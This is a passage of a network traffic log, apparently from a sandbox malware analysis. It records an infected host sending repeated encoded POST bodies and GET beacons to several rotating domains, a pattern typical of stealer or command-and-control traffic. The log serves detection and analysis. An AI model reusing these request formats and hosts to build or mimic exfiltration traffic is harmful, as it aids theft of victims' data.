                                                                                Nov 25, 2024 12:01:37.598331928 CET1289INData Raw: 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d
                                                                                Data Ascii: ,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetic
                                                                                Nov 25, 2024 12:01:37.598345995 CET1289INData Raw: 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67
                                                                                Data Ascii: op.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-b
                                                                                Nov 25, 2024 12:01:37.598532915 CET1289INData Raw: 6f 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f
                                                                                Data Ascii: om:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/2
                                                                                Nov 25, 2024 12:01:37.598543882 CET1289INData Raw: 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70
                                                                                Data Ascii: rgin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptiv
                                                                                Nov 25, 2024 12:01:37.810506105 CET1289INData Raw: 6c 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73
                                                                                Data Ascii: large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                63 | 192.168.11.20 | 49806 | 208.91.197.27 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:51.768299103 CET | 736 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 74 45 57 78 56 50 50 79 48 6d 6f 41 64 36 34 4e 38 6f 62 74 67 58 2b 72 2b 74 5a 58 35 75 77 61 5a 4f 4b 59 70 41 61 76 38 6d 4e 4e 70 67 59 6b 35 45 37 57 33 77 5a 77 6b 49 74 44 46 33 6c 6d 67 4e 39 7a 6b 31 47 31 2b 7a 74 6e 47 38 52 67 73 39 71 65 54 70 68 76 39 33 59 51 31 53 69 65 7a 37 44 2f 77 73 56 70 6f 38 77 58 51 46 4f 54 4a 65 46 59 6b 56 69 46 46 6c 4e 46 69 36 4d 4a 30 5a 6d 58 77 63 67 77 7a 61 2b 65 6f 33 49 36 61 49 6e 55 39 62 4f 61 73 77 43 4a 71 7a 78 73 50 37 75 42 49 53 4e 74 49 32 66 54 6e 71 51 55 56 41 73 4c 71 41 3d 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLftEWxVPPyHmoAd64N8obtgX+r+tZX5uwaZOKYpAav8mNNpgYk5E7W3wZwkItDF3lmgN9zk1G1+ztnG8Rgs9qeTphv93YQ1Siez7D/wsVpo8wXQFOTJeFYkViFFlNFi6MJ0ZmXwcgwza+eo3I6aInU9bOaswCJqzxsP7uBISNtI2fTnqQUVAsLqA==


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                64 | 192.168.11.20 | 49807 | 208.91.197.27 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:54.424179077 CET | 756 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4c 47 5a 76 57 4d 71 34 54 75 4c 66 73 6c 6d 78 5a 4f 50 79 57 57 6f 44 52 61 34 4e 6e 59 62 70 67 58 69 72 2b 73 4e 39 36 64 55 61 5a 75 36 59 6f 42 61 76 73 32 4e 4e 6a 41 59 72 6d 55 37 52 33 77 56 34 6b 4d 74 44 46 30 5a 6d 67 49 42 7a 6b 6d 75 30 78 44 74 6c 4f 63 52 69 69 64 71 65 54 70 68 76 39 32 38 36 31 53 4b 65 7a 4c 7a 2f 69 39 56 6f 68 63 77 59 54 46 4f 54 59 75 45 52 6b 56 69 37 46 6b 52 37 69 38 51 4a 30 64 69 58 77 70 4d 2f 36 61 2b 69 77 58 49 73 63 71 4c 61 6b 76 48 6d 6d 77 47 79 6a 7a 78 6b 44 4e 6a 62 56 67 35 4a 4c 6c 44 68 6a 61 70 38 58 43 74 51 33 4e 71 61 6d 69 79 59 56 69 68 6f 46 43 6d 78 36 48 70 33 75 6a 38 3d
                                                                                Data Ascii: 2WLcH=LGZvWMq4TuLfslmxZOPyWWoDRa4NnYbpgXir+sN96dUaZu6YoBavs2NNjAYrmU7R3wV4kMtDF0ZmgIBzkmu0xDtlOcRiidqeTphv92861SKezLz/i9VohcwYTFOTYuERkVi7FkR7i8QJ0diXwpM/6a+iwXIscqLakvHmmwGyjzxkDNjbVg5JLlDhjap8XCtQ3NqamiyYVihoFCmx6Hp3uj8=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                65 | 192.168.11.20 | 49808 | 208.91.197.27 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:57.079617977 CET | 2440 | OUT | POST /ftvk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Origin: http://www.614genetics.online
                                                                                Referer: http://www.614genetics.online/ftvk/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                66 | 192.168.11.20 | 49809 | 208.91.197.27 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:01:59.734838963 CET | 460 | OUT | GET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.614genetics.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:00.202306032 CET | 993 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 11:01:59 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=904vr480078119963051618; expires=Sat, 24-Nov-2029 11:01:59 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24drIRSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg==
                                                                                Content-Length: 2630
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                67 | 192.168.11.20 | 49810 | 8.210.46.21 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:05.515039921 CET | 724 | OUT | POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 54 4d 6d 71 4e 5a 62 75 73 51 78 38 5a 61 41 54 6e 6b 4f 69 4d 7a 34 2f 51 77 32 31 6e 39 70 61 34 46 6b 70 53 68 32 4f 41 47 34 32 75 4c 37 2b 59 76 63 33 43 78 6b 2f 36 7a 2f 6b 2b 51 78 54 6e 2f 4e 71 55 7a 38 34 73 41 69 51 4a 66 6d 42 66 78 76 4e 57 35 43 6d 62 74 6a 52 38 54 75 46 72 51 36 63 6b 42 64 74 51 64 31 4c 68 72 54 61 37 48 76 65 39 57 30 33 6b 6e 47 53 74 56 65 31 4b 73 41 2b 45 47 6b 55 74 4b 56 6b 38 79 44 57 59 46 4d 50 69 6c 2f 65 6f 75 35 6a 36 49 6a 45 43 6e 42 35 6a 73 69 59 68 4a 70 45 53 36 73 69 6b 6b 32 46 42 77 3d 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwTMmqNZbusQx8ZaATnkOiMz4/Qw21n9pa4FkpSh2OAG42uL7+Yvc3Cxk/6z/k+QxTn/NqUz84sAiQJfmBfxvNW5CmbtjR8TuFrQ6ckBdtQd1LhrTa7Hve9W03knGStVe1KsA+EGkUtKVk8yDWYFMPil/eou5j6IjECnB5jsiYhJpES6sikk2FBw==
                                                                                Nov 25, 2024 12:02:05.819756985 CET | 508 | IN | HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:05 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                68 | 192.168.11.20 | 49811 | 8.210.46.21 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:08.358321905 CET | 744 | OUT | POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 56 74 57 71 43 59 62 75 38 41 78 37 63 61 41 54 70 45 4f 6d 4d 7a 30 2f 51 79 62 34 6e 50 64 61 34 6b 30 70 54 67 32 4f 44 47 34 32 6d 72 37 37 48 2f 63 67 43 78 5a 43 36 78 37 6b 2b 51 6c 54 6e 2b 39 71 55 69 38 37 74 51 69 4f 42 2f 6d 50 43 68 76 4e 57 35 43 6d 62 72 50 37 38 53 47 46 71 68 71 63 6c 6b 70 71 54 64 31 45 69 72 54 61 2f 48 76 53 39 57 30 46 6b 6d 71 73 74 58 57 31 4b 70 73 2b 46 58 6b 54 6d 4b 56 75 6b 53 43 46 66 47 64 47 6c 33 7a 77 70 70 68 76 37 59 33 35 4b 52 4d 6a 2b 65 57 38 69 61 31 32 57 4b 56 4b 6d 6d 33 65 63 79 6d 55 6a 64 78 64 75 63 7a 7a 41 2f 51 61 47 53 50 50 59 70 6b 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPda4k0pTg2ODG42mr77H/cgCxZC6x7k+QlTn+9qUi87tQiOB/mPChvNW5CmbrP78SGFqhqclkpqTd1EirTa/HvS9W0FkmqstXW1Kps+FXkTmKVukSCFfGdGl3zwpphv7Y35KRMj+eW8ia12WKVKmm3ecymUjdxduczzA/QaGSPPYpk=
                                                                                Nov 25, 2024 12:02:08.678581953 CET | 503 | IN | HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:08 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:08.678633928 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                69 | 192.168.11.20 | 49812 | 8.210.46.21 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:11.190808058 CET | 2578 | OUT | POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:11.500478983 CET | 503 | IN | HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:11 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:11.500518084 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                70 | 192.168.11.20 | 49813 | 8.210.46.21 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:14.024198055 CET | 456 | OUT | GET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:14.324695110 CET | 422 | IN | HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:14 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Cache: MISS
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:14.324779987 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                71 | 192.168.11.20 | 49814 | 154.88.22.105 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:19.636074066 CET | 712 | OUT | POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPwISfMxIiNROmZ449UJ+8OCxYNW/h9vkJZZ6rnnzIBC7iM7A/mYHOu5WFcAPhDAyq9Do+OeGZoz7sJtNuy0O7e4zRz3VykPBnkaZ4AJJAz/Ct2ov3DPvf7WHkyNNFeMXNcipbWGV/JVMLPGp2HcPtfBmMsucipkZuUusi7tiMxiVuRrG6Wa4Ylg==
                                                                                Nov 25, 2024 12:02:19.955864906 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                72 | 192.168.11.20 | 49815 | 154.88.22.105 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:22.460503101 CET | 732 | OUT | POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99AJZ5KrmmzIIS7iHbA6iYHVu5SrcEHhDEaq9Hk+OvGaqj7ucdNs20O7e4zRz3RUkPZnkqJ4AoJH7fCq/Iv3HPvb7WHjyMQNeOvNcjZbWSBwAVNhSWoaUNm3XwKjgsIHo0V1R4h4mfWoyxJcVb/SUY5D4pct2zq+0S4iqwYz6rTTQVE=
                                                                                Nov 25, 2024 12:02:22.779562950 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                73 | 192.168.11.20 | 49816 | 154.88.22.105 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:02:25.289370060 CET | 2578 | OUT | POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:25.606828928 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
